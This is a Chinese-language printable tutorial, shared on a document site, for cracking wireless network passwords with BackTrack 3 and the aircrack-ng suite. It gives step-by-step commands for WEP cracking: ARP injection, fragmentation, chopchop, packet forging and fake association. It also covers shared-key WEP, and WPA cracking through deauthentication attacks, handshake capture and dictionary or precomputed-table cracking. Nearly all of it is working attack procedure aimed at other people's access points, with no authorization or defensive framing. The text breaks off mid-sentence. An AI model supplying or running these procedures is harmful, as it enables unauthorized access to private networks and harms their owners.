BT3无线密码破解教程打印版.docx
《BT3无线密码破解教程打印版.docx》由会员分享,可在线阅读,更多相关《BT3无线密码破解教程打印版.docx(33页珍藏版)》请在冰点文库上搜索。
BT3无线密码破解教程打印版
开放式WEP破解
1.装备:
IMBX60笔记本(内置Intel3945无线网卡)、BT3的U盘系统(需用syslinux命令来指定启动BT3的盘符)
2.用户名:
root密码:
toor,进入图形界面:
startx。
启动BT3后,(启动黑屏:
xconf再输入startx)
3.加载3945网卡的驱动。
打开一个shell
输入modprobe–riwl3945卸载原来的网卡驱动
输入modprobeipwraw加载可监听的网卡驱动
注:
不同的网卡有不同的加载方式
LINUX驱动是通过模块进行加载的,可以用lsmod来查看机器已加载的模块
然后可以通过modinfoipwraw(模块名)来查看所加载驱动模块的版本信息
最新的ipwraw的版本是ipwraw-ng-2.3.4-04022008.tar.bz2的。
最新的版本需要设置rate为1M设置命令为iwconfigwifi0rate1M
这个版本的驱动支持3945无线网卡发射功率得设置,命令如下
iwconfigwifi0txpower16(TXPOWER是你想设置的值min=-12andmax=16,单位为dBm)
参数on/off可以打开和关闭发射单元,auto和fixed指定无线是否自动选择发射功率。
注:
降低连接速率可提高建立虚拟连接的成功率和稳定性,提高发射功率可增加发射距离。
4.查找目标:
可以用airodump-ngwifi0来搜索
注:
通过扫描获得你要破解的AP的MAC和SSID还有是否有客户端等信息。
记录下这些信息后,请关闭此窗口。
不然会出现后面建立虚拟连接时信道一直在跳转的情况。
我们选择第一个作为目标,channel为11(上图中的CH代表信道)。
注:
修改自己网卡的MAC地址的命令。
输入macchanger–m00:
11:
22:
33:
44:
55wifi0
5.激活网卡的Monitor模式并工作在11信道。
(加载网卡,激活监听模式,工作在11信道)
输入airmon-ngstartwifi011也可用iwconfiwifi0来查看网卡的工作模式和工作信道。
可用aireplay-ng-9wifi0测试注入
6.输入截取数据包命令(截取11信道的ivs数据包,并保存名为name.ivs)
输入命令airodump-ng--ivs-wname-c11wifi0,
(--ivs:
仅截取ivs数据包,-w:
写入文件,-c:
截取ivs的信道)
(其中name是获取的ivs的保存文件的名字,11是channel值,你根据实际修改)
一.有客户端WEP破解
1.有客户端,且合法客户端产生大量有效的数据,能直接获得大量IVS。
思路:
1-6步同上
7.直接用aircrack-ng破解
第七步:
aircrack-ng-n64-bname-01.ivs
2.有客户端,合法客户端只能产生少量ivs数据,就需要注入攻击加速产生大量ivs。
只要有少量的数据就可能获得arp请求包,则可用arp注入模式的-3模式通过不断向AP发送
同样的arp请求包,来进行注入式攻击。
思路:
1-6步同上
7.用aireplay-ng的arp注入方式获得大量的ivs
第七步:
aireplay-ng-3-b-h<合法客户端mac>wifi0
注:
这一步可能时间会长一点,因为需要等到ARP。
3.有客户端,但是客户端根本不在通信,不能产生ARP包。
-3注入模式不成功思路:
1-6步同上
7.-0冲突模式强制断开合法客户端和ap连接,使之重新连接
8.利用-0冲突模式重新连接所产生的握手数据让-3获得有效的ARP从而完成ARP注入
第七步:
aireplay-ng-3-b-h<合法客户端mac>wifi0
第八步:
aireplay-ng-010–a-c<合法客户端mac>wifi0
4.有客户端,并且客户端能产生有效arp数据的另类破解方式
前面的步骤一样:
输入modprobe–riwl3945
输入modprobeipwraw
输入airmon-ngstartwifi011
现在,只要一个命令就搞定,输入:
输入wesside-ng-iwifi0-v01:
02:
03:
04:
05:
06(此格式的APMAC)。
Wesside-ng这个命令其实就是一个-5碎片注入,fragmentation构造注入包,-3arp注入,最后PTW破解这样一个思路。
二.无客户端开放式WEP破解
思路:
1-6步同上
因为是无客户端,所以第一步就需要和AP之间建立一个虚拟连接。
这是非常关键的一步。
为让AP接受数据包,必须使自己的网卡和AP关联。
如果没有关联的话,目标AP
将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
第七步:
输入aireplay-ng-10-e-a-hwifi0
如果回显虚拟伪装连接不成功,不能成功的原因很多,具体有如下几种:
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道注:
遇有不规则的essid可用引号将essid引起来比如,‘jackchen’。
虚拟连接不成功可做如
1.直接将-e这个参数省略掉
2.降低网卡的速率重新进行连接
Iwconfigwifi0rate2M
参数说明:
rate后面跟连接的速率,可以从小往大设置做尝试连接。
后面的单位M必须为大写
也可以使用命令tcpdump来确认网卡是否已经连接到目标AP上
tcpdump-n-e-s0-vvv-iwifi0
1.第一种破解方式:
思路:
1-7步同上
建立虚拟连接后直接用-2交互攻击模式,这个模式集合了抓包和提取数据,发包注入三种能力。
第八步:
抓包,提数据和发包攻击
aireplay-ng-2-p0841-cff:
ff:
ff:
ff:
ff:
ff-b-hwifi0
发包成功后可得到足够的ivs,然后用aircrack-ng破解。
成功后如上图截获了一个可以直接进行注入的数据包,并回显Usethispacket,按y然后开始
发包攻击,date飞快涨。
当获得足够的ivs以后就可破解了。
2.第二种破解方式:
思路:
1-7步同上
第八步:
利用-5碎片攻击模式获得一个可用的包含密钥是数据文件(xor文件)
第九步:
然后通过数据包制造程序Packetforge-ng提取xor文件中的PRGA伪造一个arp包,
第十步:
最后利用交互式攻击模式-2发包攻击。
第八步:
采用碎片包攻击模式-5,获得一个PRGA数据包(xor文件)。
输入aireplay-ng-5-b-hwifi0
如顺利,将得到一个可利用的数据包如上图,系统将回显Usethispacket?
输入y回车,将得到一个至
关重要的xor文件。
这一步生成的xor文件将被我们用来产生arp数据包。
再输入ls查看当前目录,你将看到刚才生成的一个后缀名为xor的文件。
第九步:
用数据包制造程序packetforge-ng将上面获得的PRGA数据包伪造成可利用的ARP注入包。
其工作原理就是使目标AP重新广播包,当AP重广播时,一个新的IVS将产生,我们就是利用这个来破解。
输入packetforge-ng-0-a-h-k255.255.255.255–l255.255.255.255-y
name-xor-wmyarp
参数说明:
-y(filename)是用来读取PRGA的文件
-w(filename)将arp包写入文件,我用的文件名是myarp
系统回显:
Wrotepacketto:
mrarp
第十步:
采用交互模式-2,发包注入攻击。
输入aireplay-ng-2–rmyarp-x256rausb0
【-r】:
从指定文件中读取arp数据包
【-x】:
定义每秒发送的数据包数量。
为避免网卡死机,可选择256,最高不超过1024
输入y回车攻击开始
这时,前面的抓包窗口上的data将迅速增加。
到数据增加到1.5万以上时。
第十一步:
采用aircrack-ng来进行破解
3.第三种破解方式:
思路:
1-7步同上
第八步:
利用-4的Chopchop攻击模式获得一个可用的包含密钥数据文件(xor文件)第九步:
通过数据包制造程序Packetforge-ng提取xor文件中的PRGA伪造一个arp包第十步:
最后利用交互式攻击模式-2发包攻击。
第八步:
采用-4的Chopchop攻击模式获得一个包含密钥数据的xor文件
输入aireplay-ng-4-b-hwifi0
参数说明:
-b:
设置需要破解的AP的mac
-h:
设置用于连接的无线网卡的mac(自己网卡)
顺利将得到一个可利用的数据包,按y将利用此数据包生产一个xor文件
如上图所示得到一个名为replay_dec-0523-075615的xor文件,
第九步:
通过数据包制造程序Packetforge-ng提取上面xor文件来伪造一个arp包
输入packetforge-ng-0-a-h-k255.255.255.255–l255.255.255.255-y
name-xor-wmyarp
如上图,成功生成一个名为myarp的可用来注入的arp数据包。
第十步:
最后利用交互式攻击模式-2发包攻击。
输入aireplay-ng-2-rmyarprausb0
发现了可利用的myarp的数据包,按y后,立刻注入攻击。
Date疯涨
注入成功将会获得足够的ivs然后直接用aircrack进行破解
注:
在破解无客户端的时候经常会遇到有些AP,尝试了各种注入攻击模式都无法成功注入,
date一直为0。
这时候可以根据下面的四种提示做进一步的尝试。
1.移动无线网卡位置让其获得更好的信号强度;
2.在注入攻击的过程中尝试多次进行-1虚拟连接;
3.在-2交互模式攻击中加入-F参数(自动选择获取的数据包进行注入攻击)如下图所示
然后你可以一边去做自己的事,等你忙好了回来的时候说不定date已经涨到几十万了;
4.在使用各种注入命令等待获取注入数据包的时候,如果你另外有一台计算机可以让另外一台计算机连接到你要破解的无线AP。
在连接过程中当提示输入密码的时候,你随便输入一个什么密码,会出现正在获取IP地址。
这时候你的注入攻击的页面就会获得一个可用的注入数据包,从而实现注入攻击。
预共享WEP破解
大家都知道WEP加密有两种加密方式开放式和共享式。
开放式系统验证和共享密钥验证两种模式中,每个
移动客户端都必须针对访问点进行验证。
开放式系统验证其实可以称为“无验证”,因为实际上没有进行验证——工作站说“请求验证”,而AP也不管是否密钥是否正确,先“答应了再说”,但最终ap会验证密钥是否正确,决定是否允许接入——这种验证方式的ap,往往你随便输入一个密码,都可以连接,但如果密码不正确,会显示为“受限制”。
共享密钥验证稍微强大一些,工作站请求验证,而访问点(AP)用WEP加密的质询进行响应。
如果工作站的提供的密钥是错误的,则立即拒绝请求。
如果工作站有正确的WEP密码,就可以解密该质询,并允许其接入。
因此,连接共享密钥系统,如果密钥不正确,通常会立即显示“该网络不存在等提示”。
前提:
预共享WEP破解必须要有合法无线客户端
预共享密钥的WEP不能建立-1虚拟连接,你在建立虚拟连接的时候会有如下提示,见图中红色提示。
由于预共享WEP加密不能建立虚拟连接,因此预共享WEP破解必须是有客户端,无客户端不能进行破解
具体破解方式和开放式WEP破解的思路是一样的。
1.正常激活网卡的监听模式
2.输入截取数据包命令(截取11信道的ivs数据包,并保存名为name.ivs)
输入命令airodump-ng--ivs-wname-c11wifi0
(--ivs:
仅截取ivs数据包,-w:
写入文件,-c:
截取ivs的信道)
(其中name是获取的ivs的保存文件的名字,11是channel值,你根据实际修改)如下图所示STATION下有一个合法的客户端,AUTH下显示SKA为预共享WEP加密方式
破解思路一:
3.用aireplay-ng的arp注入
aireplay-ng-3-b-h<合法客户端mac>wifi0
注:
-h后面跟合法客户端的MAC地址
如下图所示成功注入
注:
这一步可能时间会长一点,因为需要等到可注入的ARP。
注入成功将会获得足够的ivs然后直接用aircrack进行破解
破解思路二:
3.用-2交互攻击模式注入
aireplay-ng-2-p0841-cff:
ff:
ff:
ff:
ff:
ff-b-h<合法客户端mac>wifi0
注:
-h后面跟合法客户端的MAC地址
如下图所示成功注入
注入成功将会获得足够的ivs然后直接用aircrack进行破解
破解思路三:
以上两步都是基于有客户端并且客户端能产生少量数据的情况,但是有时候AP有客户端连接,但是并不在
通信不能产生少量可用于注入的数据包。
这时候就可以利用-0冲突模式重新连接所产生的握手数据让-3的
ARP注入方式或-2交互注入方式获得有效的可用于注入的ARP从而完成注入。
如下图所示
当-0冲突模式攻击成功后,-2的交互模式立刻获得一个可用的注入包。
如下图所示
破解思路四:
大家看这张图,在建立-1虚拟连接的时候出现失败的提示
Yousheouldspecifyaxorfile(-y)withatleast148keystreambytes
提示你建立虚拟连接需要用-y参数指定一个预共享密钥的握手包。
这个握手包的获得和WPA中握手包的获得方式是一样的,采用-0冲突模式,获得一个以APMAC为名的xor
包。
然后在-1建立虚拟连接的时候指定这个包。
然后利用-5碎片攻击模式攻击,packetforge-ng构造ARP注入包,然后-2注入。
从而获得足够的ivs用于
破解。
因为我一执行-0冲突模式,导致另外系统蓝屏,所以没能获得这个握手包,这部分内容不够详细。
等我换了网卡再做测试,如果OK我会补充到教程中。
WPA破解详细教程
破解WPA的前提:
必须要有合法无线客户端
WPA破解的原理:
利用Deauth验证攻击。
也就是说强制让合法无线客户端与AP被断开,当它被从WLAN中断开后,这个无线客户端会自动尝试重新连接到AP上,在这个重新连接过程中,数据通信就产生了,然后利用airodump捕获一个无线路由器与无线客户端四次握手的过程,生成一个包含四次握手的cap包。
然后再利用字典进行暴力破解。
1.激活网卡,并让其工作于11信道
Airmon-ngstartwifi011
2.捕获11信道的cap包,并保存cap包为123.cap
Airodump-ng–w123–c11wifi0
上图可以看出采用了WPA加密方式,并且有一个0016b69d10ad合法的无线客户端。
3.进行Deauth验证攻击,强制断开合法无线客户端和AP直接的连接,使其重新进行连接
aireplay-ng-010-a-cwifi0
解释:
-0指的是采取Deautenticate攻击方式,后面为发送次数。
-c建议还是使用,效果会更好,这个后面跟
的是监测到的合法的已连接的客户端MAC地址
注意上图红色部分,-c后面为合法无线客户端的MAC地址Deauth攻击往往并不是一次攻击就成功,为确保成功截获需要反复进行(WPA破解不用等到数据Data达到几万,因为它只要一个包含WPA4次握手验证包就可以了)。
如果成功捕获会出现下图红色部分的提示
这时如果输入dir就可以在root目录下看到名为123.cap的握手包了。
得到握手包以后就可以用字典直接破解首先将在windows下用字典工具生成的字典(例password.txt)拷贝到root目录下在BT3桌面双击system然后出现下图。
图中左边红色就为root目录,图中红色存储介质双击打开以后就看到你的每个硬盘的分区了。
可以进入硬
盘分区右键拷贝,然后进入root目录右键粘贴。
如下图红色部分
目前WPA的破解主要还是基于暴力破解和字典破解,暴力破解和字典破解的一个共性就是“耗时、费力、
运气”所以往往有时候你花了很多时间但还是破不了,这时候希望大家还是要接受这样一个残酷的现实。
破解方式一:
用Cap数据包直接暴力破解
从破解难度上讲WEP是很容易破解的,只要你收集足够的Cap数据包就肯定可以破解。
WPA的破解需要
有好的密码字典配合才能完成,复杂的WPA密码可能几个月也破解不出来。
输入:
aircrack-ng-z–b123*.cap
123是前面所获得的握手包的文件名。
系统会自动在你输入的文件名后加上-01、-02(如果数据包太多,系
统会自动分成几个文件存储并自动命名,可以使用ls查看),输入123*是打开所有123相关的cap文件。
常见问题:
步骤2中收集数据包已达30W,无法破解密码。
可能系统自动分成了几个文件贮存cap包。
如输入123-01.cap破解可能导致破解不成功,建议使用123*.cap选择所有的cap包进行破解。
破解方式二.挂字典破解
一.直接在BT3中挂字典破解
aircrack-ng–wpassword.txt–b123.cap
参数说明:
passwrod.txt为字典名称123.cap为步骤2中获得的握手信息包
耗时1分31秒获得WPA密码,如下图
从上图可以看出破解用时1分31秒,速度149.91K/S
注:
本教程只为了描述破解的过程。
我是做了个256K的小字典,事先把密码已经加到字典里了。
二.也可以把包含4次握手的CAP数据包拷贝到硬盘下在WIN下用WinAircrack挂字典破解。
如上图Encryptiontype处选择WPA-PSK,下面capturefiles处导入抓取的握手包123.cap
然后选择WPA选项,如下图
在上图中Dictionaryfile处导入字典文件password.txt。
然后点击右下角的Aircrackthekey
然后出现下图提示
上图,选择1后回车,然后开始破解。
成功破解如下图
从上图可以看出破解用时54秒,速度251.73K/S(比BT3下要快)
三.通过airolib构建WPAtable实现WPA线速破解
WPA的字典破解除了直接挂字典破解外,另外一种就是用airolib将字典构造成WPAtable然后再用aircrac
进行破解。
构建WPAtable就是采用和WPA加密采用同样算法计算后生成的Hash散列数值,这样在需要破解的时候直接调用这样的文件进行比对,破解效率就可以大幅提高。
先讲通过airolib构建WPAtable
WPAtable具有较强的针对ssid的特性。
1.在构建WPAtable之前需要准备两个文件:
一个是ssid列表的文件ssid.txt,一个是字典文件
password.txt。
下图为我的文件
大家可以看到两个txt的文件,ssid记事本里是ssid的列表,你可以增加常见的ssid进去,后面的passwrod
就是字典文件了。
2.把这ssid.txt和password.txt还有上面抓到的握手包123.cap这三个文件拷贝到root目录下方便使用。
见下图
3.开始利用airolib-ng来构建WPAtable了。
构建wpatable保存的名字为wpahash(下同)
第一步,如下图
airolib-ngwpa--importessidssid.txt
第二步,如下图
airolib-ngwpa--importpasswdpassword.txt
第三步,如下图
airolib-ngwpa--cleanall
第四步,如下图
airolib-ngwpa--batch
注:
这一步要等很久(视字典大小而定,我256K的字典等了有15分钟)
4.用aircrack来利用WPAtable进行破解
Aircrack-ng–rwpahash123.cap
选择1以后将开始破解。
成功破解将如下图所示
从上图中可以看出耗时00:
00:
00反正不超过1秒钟,速度42250.00K/S
大家也看到了三种破解方式,直接挂字典中在win下用WinAircrack破解是速度比在BT3下要快。
直接挂字典破解不超过1分钟就破出了密码;利用WPAtable破解速度虽然不到一秒,但是构建WPAtable却耗费了15分钟。
构建WPAtable是很耗时的,但是构建出了包括常见ssid的和相对较大字典的WPAtable的话,以后破解的速度将大大降低。
当然没有万能的字典,如果有万能的字典,再构建出一个常见ssid的WPAtable的话那这个预运算数据库是超级超级庞大的。
注:
WIN平台下的CAIN软件中的破解器也可用于WEP和WPA的基于暴力和字典的破解,但是其破解速度很慢,
相比aircrack-ng而言不具实用价值。
Aireplay-ng的6种攻击模式详解
-0Deautenticate冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。
在重新连接过程中